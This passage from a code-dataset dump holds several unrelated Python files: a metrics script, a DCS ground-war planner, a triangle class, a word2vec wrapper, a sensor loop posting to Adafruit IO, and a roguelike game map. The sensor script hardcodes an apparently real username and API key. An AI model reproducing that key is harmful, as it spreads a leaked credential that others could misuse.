result[subject][g][tc][app]['at'] = temp_at\n metrics = ['apfdc','ft','at']\n labels = ['ugt','uga','uge','uarp','agt','aga','age','aarp','random']\n for metric in metrics:\n print('metric : ' + metric)\n f = open('data_rq3/%s_testclass.csv'%metric,'w')\n tempstr = ''\n for app_index in range(len(apps)):\n app = apps[app_index]\n tempstr = tempstr + '%s,'%labels[app_index]\n f.write(str(tempstr[0:-1]) + '\\n')\n for subject in subjects:\n tempstr = ''\n for app in apps:\n tempstr = tempstr + '%s,'%(result[subject][g][tc][app][metric])\n f.write(str(tempstr[0:-1]) + '\\n')\n f.close()\n for app in apps:\n templist = []\n for subject in subjects:\n templist.append(result[subject][g][tc][app][metric])\n if metric == 'apfdc':\n print(app + ' : %.4f'%np.mean(templist))\n else:\n print(app + ' : %.2f'%np.mean(templist))\n print('**************') \n\n\n","sub_path":"code/statistic/rq3-testclass.py","file_name":"rq3-testclass.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"51134997","text":"import random\nfrom enum import Enum\n\nfrom dcs.vehicles import *\n\nfrom gen import Conflict\nfrom gen.ground_forces.combat_stance import CombatStance\nfrom theater import 
ControlPoint\n\nimport pydcs_extensions.frenchpack.frenchpack as frenchpack\n\nTYPE_TANKS = [\n Armor.MBT_T_55,\n Armor.MBT_T_72B,\n Armor.MBT_T_80U,\n Armor.MBT_T_90,\n Armor.MBT_Leopard_2,\n Armor.MBT_Leopard_1A3,\n Armor.MBT_Leclerc,\n Armor.MBT_Challenger_II,\n Armor.MBT_M1A2_Abrams,\n Armor.MBT_M60A3_Patton,\n Armor.MBT_Merkava_Mk__4,\n Armor.ZTZ_96B,\n\n # WW2\n Armor.MT_Pz_Kpfw_V_Panther_Ausf_G,\n Armor.MT_Pz_Kpfw_IV_Ausf_H,\n Armor.HT_Pz_Kpfw_VI_Tiger_I,\n Armor.HT_Pz_Kpfw_VI_Ausf__B__Tiger_II,\n Armor.MT_M4_Sherman,\n Armor.MT_M4A4_Sherman_Firefly,\n Armor.StuG_IV,\n Armor.ST_Centaur_IV,\n Armor.CT_Cromwell_IV,\n Armor.HIT_Churchill_VII,\n\n # Mods\n frenchpack.DIM__TOYOTA_BLUE,\n frenchpack.DIM__TOYOTA_GREEN,\n frenchpack.DIM__TOYOTA_DESERT,\n frenchpack.DIM__KAMIKAZE,\n\n frenchpack.AMX_10RCR,\n frenchpack.AMX_10RCR_SEPAR,\n frenchpack.AMX_30B2,\n frenchpack.Leclerc_Serie_XXI,\n\n]\n\nTYPE_ATGM = [\n Armor.ATGM_M1045_HMMWV_TOW,\n Armor.ATGM_M1134_Stryker,\n Armor.IFV_BMP_2,\n\n # WW2 (Tank Destroyers)\n Armor.M30_Cargo_Carrier,\n Armor.TD_Jagdpanzer_IV,\n Armor.TD_Jagdpanther_G1,\n Armor.TD_M10_GMC,\n\n # Mods\n frenchpack.VBAE_CRAB_MMP,\n frenchpack.VAB_MEPHISTO,\n frenchpack.TRM_2000_PAMELA,\n\n]\n\nTYPE_IFV = [\n Armor.IFV_BMP_3,\n Armor.IFV_BMP_2,\n Armor.IFV_BMP_1,\n Armor.IFV_Marder,\n Armor.IFV_MCV_80,\n Armor.IFV_LAV_25,\n Armor.IFV_Sd_Kfz_234_2_Puma,\n Armor.IFV_M2A2_Bradley,\n Armor.IFV_BMD_1,\n Armor.ZBD_04A,\n\n # WW2\n Armor.IFV_Sd_Kfz_234_2_Puma,\n Armor.LAC_M8_Greyhound,\n\n # Mods\n frenchpack.ERC_90,\n frenchpack.VBAE_CRAB,\n frenchpack.VAB_T20_13\n\n]\n\nTYPE_APC = [\n Armor.APC_M1043_HMMWV_Armament,\n Armor.APC_M1126_Stryker_ICV,\n Armor.APC_M113,\n Armor.APC_BTR_80,\n Armor.APC_MTLB,\n Armor.APC_M2A1,\n Armor.APC_Cobra,\n Armor.APC_Sd_Kfz_251,\n Armor.APC_AAV_7,\n Armor.TPz_Fuchs,\n Armor.ARV_BRDM_2,\n Armor.ARV_BTR_RD,\n Armor.FDDM_Grad,\n\n # WW2\n Armor.APC_M2A1,\n Armor.APC_Sd_Kfz_251,\n\n # Mods\n frenchpack.VAB__50,\n frenchpack.VBL__50,\n frenchpack.VBL_AANF1,\n\n]\n\nTYPE_ARTILLERY = [\n Artillery.MLRS_9A52_Smerch,\n Artillery.SPH_2S1_Gvozdika,\n Artillery.SPH_2S3_Akatsia,\n Artillery.MLRS_BM_21_Grad,\n Artillery.MLRS_9K57_Uragan_BM_27,\n Artillery.SPH_M109_Paladin,\n Artillery.MLRS_M270,\n Artillery.SPH_2S9_Nona,\n Artillery.SpGH_Dana,\n Artillery.SPH_2S19_Msta,\n Artillery.MLRS_FDDM,\n\n # WW2\n Artillery.Sturmpanzer_IV_Brummbär,\n Artillery.M12_GMC\n]\n\nTYPE_LOGI = [\n Unarmed.Transport_M818,\n Unarmed.Transport_KAMAZ_43101,\n Unarmed.Transport_Ural_375,\n Unarmed.Transport_GAZ_66,\n Unarmed.Transport_GAZ_3307,\n Unarmed.Transport_GAZ_3308,\n Unarmed.Transport_Ural_4320_31_Armored,\n Unarmed.Transport_Ural_4320T,\n Unarmed.Blitz_3_6_6700A,\n Unarmed.Kübelwagen_82,\n Unarmed.Sd_Kfz_7,\n Unarmed.Sd_Kfz_2,\n Unarmed.Willys_MB,\n Unarmed.Land_Rover_109_S3,\n Unarmed.Land_Rover_101_FC,\n\n # Mods\n frenchpack.VBL,\n frenchpack.VAB,\n\n]\n\nTYPE_INFANTRY = [\n Infantry.Infantry_Soldier_Insurgents,\n Infantry.Soldier_AK,\n Infantry.Infantry_M1_Garand,\n Infantry.Infantry_Mauser_98,\n Infantry.Infantry_SMLE_No_4_Mk_1,\n Infantry.Georgian_soldier_with_M4,\n Infantry.Infantry_Soldier_Rus,\n Infantry.Paratrooper_AKS,\n Infantry.Paratrooper_RPG_16,\n Infantry.Soldier_M249,\n Infantry.Infantry_M4,\n Infantry.Soldier_RPG,\n]\n\nMAX_COMBAT_GROUP_PER_CP = 10\n\nclass CombatGroupRole(Enum):\n TANK = 1\n APC = 2\n IFV = 3\n ARTILLERY = 4\n SHORAD = 5\n LOGI = 6\n INFANTRY = 7\n ATGM = 8\n\n\nDISTANCE_FROM_FRONTLINE = {\n CombatGroupRole.TANK:3200,\n 
CombatGroupRole.APC:8000,\n CombatGroupRole.IFV:3700,\n CombatGroupRole.ARTILLERY:18000,\n CombatGroupRole.SHORAD:13000,\n CombatGroupRole.LOGI:20000,\n CombatGroupRole.INFANTRY:3000,\n CombatGroupRole.ATGM:6200\n}\n\nGROUP_SIZES_BY_COMBAT_STANCE = {\n CombatStance.DEFENSIVE: [2, 4, 6],\n CombatStance.AGGRESSIVE: [2, 4, 6],\n CombatStance.RETREAT: [2, 4, 6, 8],\n CombatStance.BREAKTHROUGH: [4, 6, 6, 8],\n CombatStance.ELIMINATION: [2, 4, 4, 4, 6],\n CombatStance.AMBUSH: [1, 1, 2, 2, 2, 2, 4]\n}\n\n\nclass CombatGroup:\n\n def __init__(self, role:CombatGroupRole):\n self.units = []\n self.role = role\n self.assigned_enemy_cp = None\n self.start_position = None\n\n def __str__(self):\n s = \"\"\n s += \"ROLE : \" + str(self.role) + \"\\n\"\n if len(self.units) > 0:\n s += \"UNITS \" + self.units[0].name + \" * \" + str(len(self.units))\n return s\n\nclass GroundPlanner:\n\n cp = None\n combat_groups_dict = {}\n connected_enemy_cp = []\n\n tank_groups = []\n apc_group = []\n ifv_group = []\n art_group = []\n shorad_groups = []\n logi_groups = []\n\n def __init__(self, cp:ControlPoint, game):\n self.cp = cp\n self.game = game\n self.connected_enemy_cp = [cp for cp in self.cp.connected_points if cp.captured != self.cp.captured]\n self.tank_groups = []\n self.apc_group = []\n self.ifv_group = []\n self.art_group = []\n self.atgm_group = []\n self.logi_groups = []\n self.shorad_groups = []\n\n self.units_per_cp = {}\n for cp in self.connected_enemy_cp:\n self.units_per_cp[cp.id] = []\n self.reserve = []\n\n\n def plan_groundwar(self):\n\n if hasattr(self.cp, 'stance'):\n group_size_choice = GROUP_SIZES_BY_COMBAT_STANCE[self.cp.stance]\n else:\n self.cp.stance = CombatStance.DEFENSIVE\n group_size_choice = GROUP_SIZES_BY_COMBAT_STANCE[CombatStance.DEFENSIVE]\n\n # Create combat groups and assign them randomly to each enemy CP\n for key in self.cp.base.armor.keys():\n\n role = None\n collection = None\n if key in TYPE_TANKS:\n collection = self.tank_groups\n role = CombatGroupRole.TANK\n elif key in TYPE_APC:\n collection = self.apc_group\n role = CombatGroupRole.APC\n elif key in TYPE_ARTILLERY:\n collection = self.art_group\n role = CombatGroupRole.ARTILLERY\n elif key in TYPE_IFV:\n collection = self.ifv_group\n role = CombatGroupRole.IFV\n elif key in TYPE_LOGI:\n collection = self.logi_groups\n role = CombatGroupRole.LOGI\n elif key in TYPE_ATGM:\n collection = self.atgm_group\n role = CombatGroupRole.ATGM\n else:\n print(\"Warning unit type not handled by ground generator\")\n print(key)\n continue\n\n available = self.cp.base.armor[key]\n while available > 0:\n n = random.choice(group_size_choice)\n if n > available:\n if available >= 2:\n n = 2\n else:\n n = 1\n available -= n\n\n group = CombatGroup(role)\n if len(self.connected_enemy_cp) > 0:\n enemy_cp = random.choice(self.connected_enemy_cp).id\n self.units_per_cp[enemy_cp].append(group)\n group.assigned_enemy_cp = enemy_cp\n else:\n self.reserve.append(group)\n group.assigned_enemy_cp = \"__reserve__\"\n\n for i in range(n):\n group.units.append(key)\n collection.append(group)\n\n print(\"------------------\")\n print(\"Ground Planner : \")\n print(self.cp.name)\n print(\"------------------\")\n for key in self.units_per_cp.keys():\n print(\"For : #\" + str(key))\n for group in self.units_per_cp[key]:\n 
print(str(group))\n\n\n\n\n\n\n\n\n\n","sub_path":"gen/ground_forces/ai_ground_planner.py","file_name":"ai_ground_planner.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"159759372","text":"import math\n\nimport triangle\n\nclass Isosceles(triangle.Triangle):\n \"\"\"An isoscles triangle shape\n\n The shape defined by one side length and one angle.\n \"\"\"\n def __init__(self, turtle, a = None, angle = None):\n \"\"\"Main constructor\n\n Calls parent constructor with the computed third side length.\n \"\"\"\n other_side = math.sqrt((2 * (a **2)) - (2 * (a ** 2) * math.cos(angle * ((2 * math.pi) / 360))))\n super().__init__(turtle, a, a, other_side)\n\n\n def is_triangle(self):\n \"\"\"Checks if shape is a valid triangle\n \"\"\"\n return True\n\n\n def __str__(self):\n \"\"\"Gets string representation of instance\n \"\"\"\n return \"Isoceles with sides (a: {}, b: {}, c: {}), angles ({}), perimeter: {}, area: {}\".format(\n self.a,\n self.b,\n self.c,\n self.angles(),\n self.perimeter(),\n self.area())\n","sub_path":"assign-07-triangle/isosceles.py","file_name":"isosceles.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"242238308","text":"import pickle\nimport numpy as np\nimport os\nfrom gensim.models.word2vec import Word2Vec\n\nfrom corpus import Corpus\nfrom util.functions import get_config\n\n\nMODEL_NAME = \"word2vec_model\"\nANS_DICT_NAME = \"ans_dict\"\n\n\nclass MyWord2Vec:\n def train(self, corpus, model_dir, **kwargs):\n print(\"start training : word2vec\")\n self.__model = Word2Vec(corpus, **kwargs)\n print(\"finished\")\n\n model_path = model_dir + MODEL_NAME\n self.__model.save(model_path)\n print(\"model was saved\")\n\n print(\"infer answer documents\")\n self.__ans_dict = self.__make_ans_dict(corpus)\n ans_dict_path = model_dir + \"/\" + ANS_DICT_NAME\n with open(ans_dict_path, \"wb\") as f:\n pickle.dump(self.__ans_dict, f)\n print(\"finished\")\n\n @staticmethod\n def load(model_dir):\n # load word2vec model\n model_path = model_dir + MODEL_NAME\n self = MyWord2Vec()\n self.__model = Word2Vec.load(model_path)\n\n # load ans dict\n ans_dict_path = model_dir + ANS_DICT_NAME\n with open(ans_dict_path, \"rb\") as f:\n self.__ans_dict = pickle.load(f)\n\n return self\n\n def words2image(self, words):\n image = [self.__infer_vector(word) for word in words]\n image = list(filter(lambda x: len(x) != 0, image))\n return image\n\n def __infer_vector(self, word):\n try:\n return self.__model[word]\n except KeyError:\n return []\n\n def __make_ans_dict(self, corpus):\n ans_dict = {}\n for idx, words in corpus.gen_ans_with_idx():\n ans_dict[idx] = np.array(self.words2image(words))\n return ans_dict\n\n def get_ans_vec(self, idx):\n return self.__ans_dict[idx]\n\n def __len__(self):\n return self.__model.vector_size\n\nif __name__ == \"__main__\":\n print(\"*** word2vec ***\")\n config = get_config()\n # word2vecは学習が早いのでminiは不要\n config[\"mini\"] = False\n corpus = Corpus(mini=config[\"mini\"])\n\n word2vec = MyWord2Vec()\n model_dir = config[\"model_root\"] + config[\"word2vec\"][\"model_dir\"]\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n word2vec.train(corpus, model_dir, **config[\"word2vec\"][\"hyper_params\"])\n\n word2vec = MyWord2Vec.load(model_dir)\n 
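`Isosceles.__init__` in the record above derives the base from the law of cosines, c = sqrt(2*a**2 - 2*a**2*cos(theta)), converting degrees with `angle * 2*pi/360` (equivalent to `math.radians`). A quick numeric check with hypothetical values:

```python
import math

a, angle = 1.0, 60.0  # two unit legs with a 60-degree apex: an equilateral triangle
c = math.sqrt(2 * a**2 - 2 * a**2 * math.cos(math.radians(angle)))
print(round(c, 9))    # 1.0
```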
print(word2vec.get_ans_vec(\"1\"))\n","sub_path":"insuranceQA/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"185168673","text":"# code to run the loop for unit B\n# at each second, Unit B checks the API for the status that for the signal\n# every 10 seconds, it sends the sensor data to the API\n\n\n# import relevant libraries\n\n# system libraries\nimport time\nimport threading\n\n# for the Adafruit IO API\nfrom Adafruit_IO import Client\n\n# for the SGP30 functions, including I2C \nimport board\nimport busio\n\n# imports the SGP30-specific library\nimport adafruit_sgp30\n\n# importing gas module of enviroplus library\nfrom enviroplus import gas\n\n\n# neccessary definitions for sensors and API\n\n# defines the username and key for the API\naio = Client(\"rmason200\", \"d5b8d9b68d654dfb965acfb8dc1e7ffd\")\n\n# enables the I2C for the SGP30, defining pin inputs etc\ni2c = busio.I2C(board.SCL, board.SDA, frequency=100000)\n\n#initialises the SGP30 sensor, defines properties according to adafruit documentation\nsgp30 = adafruit_sgp30.Adafruit_SGP30(i2c)\nsgp30.iaq_init()\nsgp30.set_iaq_baseline(0x8973, 0x8aae)\n\n\n# loop counter\ncount = 0\n\n\ndef data_send():\n\t# reads data from sensors, assigns value to relevant variable\n\t# for SGP30 a simple read\n\teCO2_data = sgp30.eCO2\n\ttvoc_data = sgp30.TVOC\n\t# for enviroplus, gas readings taken to intermediary variable\n\tenviro_readings = gas.read_all()\n\t# specific reading taken from intermediary variable and assigned to specific variable \n\tredu_data = enviro_readings.reducing\n\toxi_data = enviro_readings.oxidising\n\n\t# prints values to terminal\n\tprint(\"eCO2:\\t\" + str(eCO2_data))\n\tprint(\"TVOC:\\t\" + str(tvoc_data))\n\tprint(\"CO:\\t\" + str(redu_data))\n\tprint(\"NO2:\\t\" + str(oxi_data))\n\n\t# sends values to API\n\taio.send('eco2-b', eCO2_data)\n\taio.send('tvoc-b', tvoc_data)\n\taio.send('redu-b', redu_data)\n\taio.send('oxi-b', oxi_data)\n\n\nwhile True:\n\t# sets up time variable needed to ensure loop happens once a second\n\t# rather than + 1 second\n\tstarttime = time.time()\n\t\n\t# prints counter to display progress of loop\n\tprint(\"\\nCount: \" + str(count))\n\tprint(\"Time: \" + str(time.time()))\n\t\n\t# receives status of signal from API, prints to terminal\n\tUnitB_status = aio.receive('status-b').value\n\tprint(\"Unit B Signal State: \" + str(UnitB_status))\n\t\n\tif count == 10:\n\t\t# creates a thread to allow the data send process to run in parallel\n\t\tdata_send_thread = threading.Thread(target = data_send)\n\t\t# starts the thread\n\t\tdata_send_thread.start()\n\t\t\n\t\t# resets count to start loop again\n\t\tcount = 0\n \n\t# increments loop\n\tcount = count + 1\n\t# sleeps process for the rest of the second\n\t# takes process time and removes it from the second, then sleeps for remaining time\n\ttime.sleep(1.0 - ((time.time() - starttime) % 60))\n","sub_path":"Other/UnitB1.py","file_name":"UnitB1.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"369376986","text":"\"\"\"\nGame map interface\n\"\"\"\nimport curses\nimport json\nimport logging\nimport random\nfrom pathlib import Path\nfrom pprint import pformat\nfrom typing import List, Set, Tuple\n\nimport constants\nimport globals\nfrom dialog import Dialog\nfrom items import Consumable, Equipment, Weapon\nfrom 
monster import Monster\nfrom player import Player, Position\nfrom user_interface import UserInterface\nfrom utility import color\n\n\nclass GameMap(UserInterface):\n \"\"\"\n Main User Interface to show current\n position, current map, current health,\n current power and the event log\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.event_log = None\n self.map = None\n self.status_info = None\n self.levels = list()\n self.level_width = 51\n self.level_height = 15\n self.levels = list()\n self.items = dict()\n self.monsters = dict()\n self.starting_positions = list()\n self.stories_shown = set()\n for index, file in enumerate(\n sorted(\n (Path(__file__).parent.parent / 'resources' / 'levels')\n .glob('*.level'),\n key=lambda x: int(x.stem)\n )\n ):\n with file.open() as level:\n self.levels.append(self.parse_level(level.read(), index))\n self.player = Player(Position(self.level_width, self.level_height,\n layouts=self.levels))\n self.player.position.x, self.player.position.y = \\\n self.starting_positions[0]\n self._last_position = self.current_position\n self.visited: List[Set[Tuple[int, int]]] = [set() for _ in\n range(len(self.levels))]\n self.seen: List[Set[Tuple[int, int]]] = [set() for _ in\n range(len(self.levels))]\n self.setup()\n\n @property\n def health_bar(self):\n health_bar = int(10 * (self.player.current_health\n / self.player.max_health)) * constants.HEALTH\n return health_bar\n\n @property\n def current_value(self) -> str:\n return self.levels[self.player.level][self.player.y][self.player.x]\n\n @current_value.setter\n def current_value(self, value: str):\n self.levels[self.player.level][self.player.y][self.player.x] = value\n\n @property\n def current_position(self):\n return self.player.x, self.player.y\n\n def save_game(self):\n data = {\n 'monsters': {str(key): vars(monster) for key, monster in\n self.monsters.items()},\n 'items': {str(key): vars(item) for key, item in\n self.items.items()},\n 'starting_positions': [list(position) for position in\n self.starting_positions],\n 'levels': self.levels,\n 'player_items': {\n 'head': vars(self.player.head) if self.player.head else None,\n 'chest': vars(self.player.chest)\n if self.player.chest else None,\n 'legs': vars(self.player.legs) if self.player.legs else None,\n 'feet': vars(self.player.feet) if self.player.feet else None,\n 'weapon': vars(self.player.weapon)\n if self.player.weapon else None,\n 'cookies': [vars(cookie) for cookie in self.player.cookies\n if cookie]\n },\n 'damage': self.player.damage,\n 'last_position': list(self._last_position),\n 'level': self.player.level,\n 'current_position': list(self.current_position),\n 'visited': [[list(position) for position in level] for level in\n self.visited],\n 'seen': [[list(position) for position in level] for level in\n self.seen],\n 'stories_shown': list(self.stories_shown)\n }\n with (Path(__file__).parent.parent / 'savegame.json').open(mode='w') \\\n as file:\n logging.info(pformat(data))\n json.dump(data, file, default=lambda x: vars(x))\n\n @classmethod\n def load_game(cls, filename: str):\n with (Path(__file__).parent.parent / filename).open() as file:\n data = json.load(file)\n game_map = cls()\n for position, monster_data in data['monsters'].items():\n position = tuple(int(i) for i in position[1:-1].split(', '))\n monster = Monster(1)\n monster.strength = monster_data['strength']\n monster.name = monster_data['name']\n game_map.monsters[position] = monster\n for position, item_data in data['items'].items():\n position = tuple(int(i) for i in 
position[1:-1].split(', '))\n item = Consumable(1) if item_data['type'] == 'Keks' \\\n else Equipment(1)\n item.name = item_data['name']\n item.factor = item_data['factor']\n item.type = item_data['type']\n game_map.items[position] = item\n game_map.starting_positions = [tuple(position) for position in\n data['starting_positions']]\n game_map.levels = data['levels']\n head = data['player_items']['head']\n chest = data['player_items']['chest']\n legs = data['player_items']['legs']\n feet = data['player_items']['feet']\n weapon = data['player_items']['weapon']\n cookies = data['player_items']['cookies']\n game_map.player.head = head if not head else Equipment(1)\n if head:\n game_map.player.head.factor = head['factor']\n game_map.player.head.name = head['name']\n game_map.player.head.type = head['type']\n game_map.player.chest = chest if not chest else Equipment(1)\n if chest:\n game_map.player.chest.factor = chest['factor']\n game_map.player.chest.name = chest['name']\n game_map.player.chest.type = chest['type']\n game_map.player.legs = legs if not legs else Equipment(1)\n if legs:\n game_map.player.legs.factor = legs['factor']\n game_map.player.legs.name = legs['name']\n game_map.player.legs.type = legs['type']\n game_map.player.feet = feet if not feet else Equipment(1)\n if feet:\n game_map.player.feet.factor = feet['factor']\n game_map.player.feet.name = feet['name']\n game_map.player.feet.type = feet['type']\n game_map.player.weapon = weapon if not weapon else Weapon(1)\n if weapon:\n game_map.player.weapon.factor = weapon['factor']\n game_map.player.weapon.name = weapon['name']\n game_map.player.weapon.type = weapon['type']\n game_map.player.cookies = list()\n for cookie_data in cookies:\n cookie = Consumable(1)\n cookie.factor = cookie_data['factor']\n cookie.name = cookie_data['name']\n cookie.type = cookie_data['type']\n game_map.player.cookies.append(cookie)\n game_map.player.position._level = data['level']\n game_map.player.damage = data['damage']\n game_map._last_position = (data['last_position'][0],\n data['last_position'][1])\n game_map.player.position._x = data['current_position'][0]\n game_map.player.position._y = data['current_position'][1]\n game_map.visited = [set(tuple(position) for position in level) for\n level in data['visited']]\n game_map.seen = [set(tuple(position) for position in level) for level\n in data['seen']]\n game_map.stories_shown = set(data['stories_shown'])\n return game_map\n\n def parse_level(self, level: str, level_number: int) -> List[List[str]]:\n level = level.replace('-', constants.HORIZONTAL)\n level = level.replace('|', constants.VERTICAL)\n level = level.replace('+', constants.CROSS)\n level = [[char for char in row]\n for row in level.split('\\n')]\n for y_index, row in enumerate(level):\n for x_index, value in enumerate(row):\n if x_index == 0 and y_index == 0:\n level[y_index][x_index] = constants.BOTTOM_RIGHT\n elif x_index == 0 and y_index == len(level) - 1:\n level[y_index][x_index] = constants.TOP_RIGHT\n elif x_index == len(row) - 1 and y_index == len(level) - 1:\n level[y_index][x_index] = constants.TOP_LEFT\n elif x_index == len(row) - 1 and y_index == 0:\n level[y_index][x_index] = constants.BOTTOM_LEFT\n elif y_index == 0 and value == constants.CROSS:\n level[y_index][x_index] = constants.TOP_OUT\n elif y_index == len(level) - 1 and value == constants.CROSS:\n level[y_index][x_index] = constants.BOTTOM_OUT\n elif x_index == 0 and value == constants.CROSS:\n level[y_index][x_index] = constants.LEFT_OUT\n elif x_index == len(row) - 1 
and value == constants.CROSS:\n level[y_index][x_index] = constants.RIGHT_OUT\n if value == 'I':\n self.items[(level_number, x_index, y_index)] = \\\n random.choice((Consumable, Equipment,\n Weapon))(level_number + 1)\n elif value == 'M':\n self.monsters[(level_number, x_index, y_index)] = \\\n Monster(level_number + 1)\n elif value == '%':\n self.starting_positions.append((x_index, y_index))\n if level_number == 0:\n level[y_index][x_index] = ' '\n return level\n\n def level_value(self, x_index: int, y_index: int) -> str:\n return self.levels[self.player.level][y_index][x_index]\n\n def visit(self, x_index: int, y_index: int):\n for vertical in range(-1, 2):\n for horizontal in range(-1, 2):\n self.visited[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n self.seen[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n\n def see(self, x_index: int, y_index: int):\n for vertical in range(-1, 2):\n for horizontal in range(-1, 2):\n self.seen[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n\n def log_event(self, message):\n self.event_log.move(1, 1)\n self.event_log.deleteln()\n self.event_log.move(self.event_log.getmaxyx()[0] - 2, 1)\n self.event_log.insertln()\n self.event_log.border()\n self.event_log.addstr(self.event_log.getmaxyx()[0] - 2, 1,\n message, color(foreground=curses.COLOR_YELLOW))\n\n def setup(self):\n self.screen = curses.newwin(0, 0)\n height, width = self.screen.getmaxyx()\n self.map = curses.newwin(self.level_height, self.level_width + 1,\n 2, width // 2 - self.level_width // 2)\n map_height, _ = self.map.getmaxyx()\n self.status_info = curses.newwin(3, width - 5, map_height + 2, 3)\n self.event_log = curses.newwin(height - (map_height + 6), width - 5,\n map_height + 5, 3)\n self.status_info.border()\n self.event_log.border()\n\n def refresh(self):\n self.screen.redrawwin()\n self.map.redrawwin()\n self.status_info.redrawwin()\n self.event_log.redrawwin()\n self.screen.refresh()\n self.map.refresh()\n self.status_info.refresh()\n self.event_log.refresh()\n\n def print(self):\n \"\"\"\n print game map to window\n \"\"\"\n if self.resized:\n self.resized = False\n self.setup()\n\n self.screen.addstr(1, 3, f\"Ebene {self.player.level}\")\n self.screen.addstr(1, 20, f'Position: {self.current_position}')\n\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n for i in (-1, 1):\n if self.level_value(self.current_position[0] + i,\n self.current_position[1]) == ' ':\n self.see(self.current_position[0] + i,\n self.current_position[1])\n if self.level_value(self.current_position[0],\n self.current_position[1] + i) == ' ':\n self.see(self.current_position[0],\n self.current_position[1] + i)\n if 0 <= self.player.level < len(self.levels):\n for y_index, row in enumerate(self.levels[self.player.level]):\n for x_index, value in enumerate(row):\n if (x_index, y_index) not in self.seen[self.player.level]:\n self.map.addstr(y_index, x_index, '#',\n color(foreground=curses.COLOR_BLUE))\n elif (x_index, y_index) \\\n not in self.visited[self.player.level] \\\n and value in ('M', 'O', 'I'):\n self.map.addstr(y_index, x_index, constants.UNKNOWN,\n color(foreground=curses.COLOR_MAGENTA))\n elif value == 'I':\n self.map.addstr(y_index, x_index, constants.ITEM,\n color(foreground=curses.COLOR_CYAN))\n elif value == 'X':\n self.map.addstr(y_index, x_index, constants.SAVEPOINT,\n color(foreground=curses.COLOR_BLUE))\n elif value == '=':\n self.map.addstr(y_index, x_index, constants.LADDER_UP,\n 
color(foreground=curses.COLOR_GREEN))\n elif value == '%':\n self.map.addstr(y_index, x_index,\n constants.LADDER_DOWN,\n color(foreground=curses.COLOR_GREEN))\n elif value == 'M':\n self.map.addstr(y_index, x_index, constants.MONSTER,\n color(foreground=curses.COLOR_RED))\n elif value == 'O':\n self.map.addstr(y_index, x_index, constants.HOLE)\n else:\n self.map.addstr(y_index, x_index, value)\n\n self.map.addstr(self.current_position[1], self.current_position[0],\n constants.PLAYER,\n color(foreground=curses.COLOR_YELLOW))\n\n self.status_info.addstr(1, 2, \"HP: \")\n self.status_info.addstr(1, 6, 10 * ' ',\n color(foreground=curses.COLOR_RED))\n self.status_info.addstr(1, 6, self.health_bar,\n color(foreground=curses.COLOR_RED))\n\n self.status_info.addstr(1, 17,\n f'{self.player.current_health:3}/'\n f'{self.player.max_health:3}')\n self.status_info.addstr(1, 27, f\"Staerke: {self.player.strength}\")\n\n self.refresh()\n\n def handle(self, key: int, previous=None):\n self._last_position = self.current_position\n\n if self.player.current_health < 1:\n return globals.GAME_OVER\n elif key in (constants.ESCAPE, constants.SPACE):\n return globals.PAUSE\n elif key in (constants.TAB, ord('i')):\n return globals.INVENTORY\n elif key == ord('h'):\n return globals.CONTROLS_MAP\n elif key in (ord('w'), constants.UP):\n self.player.position.y -= 2\n elif key in (ord('s'), constants.DOWN):\n self.player.position.y += 2\n elif key in (ord('a'), constants.LEFT):\n self.player.position.x -= 2\n elif key in (ord('d'), constants.RIGHT):\n self.player.position.x += 2\n elif key == ord('z'):\n return globals.STORY\n\n if self._last_position != self.current_position:\n if self.current_value == 'M':\n self.visit(*self.current_position)\n return globals.MONSTER\n elif self.current_value == 'I':\n return globals.ITEM\n elif self.current_value == 'X':\n return globals.SAVE_GAME\n elif self.current_value == '=':\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n globals.LADDER.upwards = True\n return globals.LADDER\n elif self.current_value == '%':\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n globals.LADDER.upwards = False\n return globals.LADDER\n elif self.current_value == 'O':\n if 0 <= self.player.level < len(self.visited):\n self.visit(*self.current_position)\n self.log_event('Du bist durch ein Loch gefallen')\n self.player.position.level -= 1\n return self\n\n\nclass LadderDialog(Dialog):\n\n def __init__(self):\n super().__init__()\n self.upwards = True\n self.question = ''\n self.options = ['[J] Ja', '[N] Nein']\n self.initialized = False\n self.setup()\n\n def print(self):\n if not self.initialized:\n if self.upwards:\n self.question = 'Du hast eine Leiter nach oben gefunden. ' \\\n 'Willst du sie herauf klettern?'\n else:\n self.question = 'Du hast eine Leiter nach unten gefunden. 
' \\\n 'Willst du sie hinab kletern?'\n self.setup()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key in (ord('j'), constants.ENTER):\n self.initialized = False\n if self.upwards:\n globals.MAP.log_event('Du bist eine Leiter hinaufgestiegen')\n globals.MAP.player.position.level += 1\n if globals.MAP.player.level not in globals.MAP.stories_shown:\n globals.MAP.stories_shown.add(globals.MAP.player.level)\n globals.STORY.text = \\\n globals.STORY.stories[str(globals.MAP.player.level)]\n return globals.STORY\n return globals.MAP\n else:\n globals.MAP.log_event('Du bist eine Leiter hinabgestiegen')\n globals.MAP.player.position.level -= 1\n return globals.MAP\n elif key == ord('n'):\n self.initialized = False\n return globals.MAP\n previous.print()\n return self\n\n\nclass SaveGameDialog(Dialog):\n \"\"\"\n Dialog when accessing a save point\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.question = \"Du kannst deinen Spielstand speichern. \" \\\n \"Dein vorheriger Spielstand wird ueberschrieben. \" \\\n \"Bist du dir sicher?\"\n self.options = [\"[J] Ja\", \"[N] Nein\"]\n self.setup()\n\n def handle(self, key: int, previous=None):\n if key == ord('n'):\n globals.MAP.log_event('Du hast das Spiel 